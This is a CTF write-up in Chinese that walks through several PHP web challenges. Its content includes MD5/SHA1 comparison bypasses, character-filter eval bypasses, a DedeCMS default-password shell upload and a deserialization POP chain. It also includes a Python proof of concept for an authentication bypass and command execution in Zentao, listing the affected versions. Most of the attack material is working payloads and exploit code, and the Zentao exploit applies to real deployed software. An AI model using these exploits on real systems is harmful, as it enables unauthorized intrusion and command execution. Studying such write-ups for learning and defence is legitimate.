EZPHP
一个一个慢慢绕过
第一层 MD5弱比较
参数a和b选其中一个进行绕过
QNKCDZO
240610708
s878926199a
s155964671a
第二层 sha1绕过
用两个sha1相同的值进行绕过(注意这里不能用burp)
c=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1&d=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1
第三层 intval 参考这个用114514.01进行绕过
第四层 NS_CTF.go
对这个参数进行传参要注意的是：不能有 _，用 [ 代替
最后一层过滤掉了所有的可见字符
无字母数字绕过正则表达式总结(含上传临时文件、异或、或、取反、自增脚本)_无字母数字异或运算绕过_yu22x的博客-CSDN博客
找一个在线运行php的
<?php
// Helper used by the writeup: URL-encode the bitwise-NOT of a string so it
// can be shipped to a sink that deny-lists visible characters (the ~ on the
// receiving side undoes it). From the defender's side this is the standard
// demonstration that character filtering in front of eval is not a control.
$encodeInverted = static function (string $text): string {
    return urlencode(~$text);
};

$a = $encodeInverted('system');
$b = $encodeInverted('cat /flag');

echo $a, "\n", $b;
?>
传参:cmd=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%9E%98);
得到最后的flag
PMS
禅道nady 上exp
# -*- coding: UTF-8 -*-
# !/usr/bin/python
'''
权限绕过+RCE POC 伪静态传参版
禅道系统 影响版本 安全版本
开源版 17.4以下的未知版本<=version<=18.0.beta1 18.0.beta2
旗舰版 3.4以下的未知版本<=version<=4.0.beta1 4.0.beta2
企业版 7.4以下的未知版本<=version<=8.0.beta1 8.0.beta2
'''
import requests
# Proxy map passed to every request in check(). Empty means traffic goes
# direct; the original kept commented host:port entries here for routing
# through a local intercepting proxy while inspecting the requests.
proxies: dict[str, str] = {}
def check(url):
    """Run the writeup's three-request chain against one Zentao base URL.

    All three requests share a ``requests`` session:
      1. GET ``misc-captcha-user.html`` — presumably the step that primes
         the session for the later, normally privileged, repo endpoints
         (the commented ``sessionVar=user`` form hints at that; unverified).
      2. POST a repository-create form to ``repo-create.html``.
      3. POST to ``repo-edit-10000-10000.html`` with a ``client`` value that
         wraps a shell command in backticks.

    Returns True when the third response no longer contains ``uid=`` (the
    writeup's success marker), after printing the URL and the response body;
    returns False and prints the exception on any failure inside the chain.
    When ``uid=`` is still present nothing is printed and None is returned.
    Note the uneven path joining: step 1 prefixes a slash while steps 2–3 do
    not, so a base URL ending in ``/`` yields ``//misc-captcha-user.html``.
    TLS verification is disabled on every request (CTF-box setting only).
    """
    captcha_url = url + '/misc-captcha-user.html'
    # url1 = url+'/index.php?m=misc&f=captcha&sessionVar=user'  # parameter form for non-pseudo-static installs
    # url2 = url+'/index.php?m=block&f=printBlock&id=1&module=my'  # page that can confirm the auth bypass
    create_url = url + 'repo-create.html'
    edit_url = url + 'repo-edit-10000-10000.html'

    base_headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36",
        "Accept-Language": "zh-CN,zh;q=0.9",
        "Cookie": "zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default",
    }
    # Same identity headers plus what the form POSTs need (same key order as before).
    form_headers = {
        **base_headers,
        "Content-Type": "application/x-www-form-urlencoded",
        "X-Requested-With": "XMLHttpRequest",
        "Referer": url + "/repo-edit-1-0.html",
    }
    create_body = 'product%5B%5D=1&SCM=Gitlab&name=66666&path=&encoding=utf-8&client=&account=&password=&encrypt=base64&desc=&uid='
    edit_body = 'SCM=Subversion&client=`tac /flag`'

    session = requests.session()
    common = dict(proxies=proxies, timeout=5, verify=False)
    try:
        # Responses of the first two steps are not inspected; only the session state matters.
        session.get(captcha_url, headers=base_headers, **common)
        session.post(create_url, data=create_body, headers=form_headers, **common)
        final = session.post(edit_url, data=edit_body, headers=form_headers, **common)
        if 'uid=' not in final.text:
            print(url, "")
            print(final.text)
            return True
    except Exception as e:
        print(e)
        return False
if __name__ == "__main__":
    # Single hard-coded CTF instance from the writeup; the result is printed,
    # not used as an exit status.
    target = "http://1a64a76c-8af4-4111-9d02-a29992f2e9d6.node2.yuzhian.com.cn/"
    print(check(target))
参考这篇博客
https://blog.csdn.net/qq_41904294/article/details/128838423
Hardphp
<?php
// not only ++
// Challenge source. highlight_file(__FILE__) below prints this very file, so the
// source is part of the program's output.
// Sink: eval() on a POST parameter, guarded only by a character deny-list and a
// length cap. A deny-list in front of eval is not a control — the hint above
// names the increment route that the allowed characters leave open. The only
// real mitigation is to never eval request data.
error_reporting(0);
highlight_file(__FILE__);
if (isset($_POST['NKCTF'])) {
    $NK = $_POST['NKCTF'];
    if (is_string($NK)) {
        // Reject letters, digits and the listed punctuation; payload must stay under 105 bytes.
        if (!preg_match("/[a-zA-Z0-9@#%^&*:{}\-<\?>\"|`~\\\\]/",$NK) && strlen($NK) < 105){
            eval($NK);
        }else{
            echo("hacker!!!");
        }
    }else{
        // A non-string value (an array) skips the filter branch and dumps phpinfo().
        phpinfo();
    }
}
?>
RCE 绕过：过滤了一堆可见字符符号，这里 ~ 和 > 都被过滤了，只能用自增的方式来进行绕过
尝试了一圈发现都不太行，先 phpinfo 看看系统禁用了哪些函数
构造一个数组让他报错执行phpinfo
过滤了很多函数 其中命令执行函数system被禁用了
再来继续看代码
过滤了所有的大小写字母和数字，常用的绕过方法取反 ~、异或 ^ 均被过滤了，这里还能采用另外一种方式：自增进行绕过
参考文章:
https://www.q1jun.cn/2023/01/21/9ccea94598fa-q1jun/#0x02-%E9%A2%98%E7%9B%AE%E8%AF%A6%E6%83%85
用readfile 读取flag
构造的payload
NKCTF=%24_%3D(_%2F_._)%5B___%5D%3B%24__%3D%2B%2B%24_%3B%24_____%3D%2B%2B%24_.%24__%3B%2B%2B%24_%2F%2B%2B%24_%3B%24_%3D_.%24_____.%3D%2B%2B%24_.%2B%2B%24_%3B%24%24_%5B___%5D(%24%24_%5B_%5D)%3B&___=readfile&_=/flag
easy_cms
织梦cms默认的后台界面
http://b5b35e86-4cba-4de3-a814-5c4896dd6607.node2.yuzhian.com.cn/dede
弱口令 admin admin登录进后台
查看模板设置 禁用了很多函数
将禁用函数全部删除
利用上传接口上传文件：直接传 shell 会被 WAF 拦，这里用文件写入的方法写入 shell
上传文件
访问执行
成功写入shell
baby_php
构造顺序:
Welcome::__destruct -> Hell0::__toString -> Happy::__invoke
参考文章:https://www.cnblogs.com/superwinner/p/17260940.html
unserialize php反序列化
url编码绕过正则检测
pop链
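<?php
// Generator for the serialized payload used in the baby_php writeup.
// The classes here are property-only stand-ins mirroring the target's layout;
// the magic methods that form the chain (per the writeup: Welcome::__destruct ->
// Hell0::__toString -> Happy::__invoke) live in the challenge code. The root
// cause being demonstrated is unserialize() of attacker-controlled data.
class Welcome{
    public $name;
    public $arg;
}
class Happy{
    public $shell;
    public $cmd;
}   // fix: this brace was missing, so Hell0 was declared inside Happy — a parse error
class Hell0{
    public $func;
}
$welcome = new Welcome();               // instantiate the object
$welcome->name = "welcome_to_NKCTF";    // assign the name property of the welcome object
$happy = new Happy();
$hello = new Hell0();
$happy->shell = "urldecode";
$happy->cmd = "%73%79%73%74%65%6d%28%27%6c%73%20/%27%29%3b";
$hello->func = $happy;
$welcome->arg = $hello;
// URL-encoded so the serialized string survives the regex check the writeup mentions.
echo urlencode(serialize($welcome));
?>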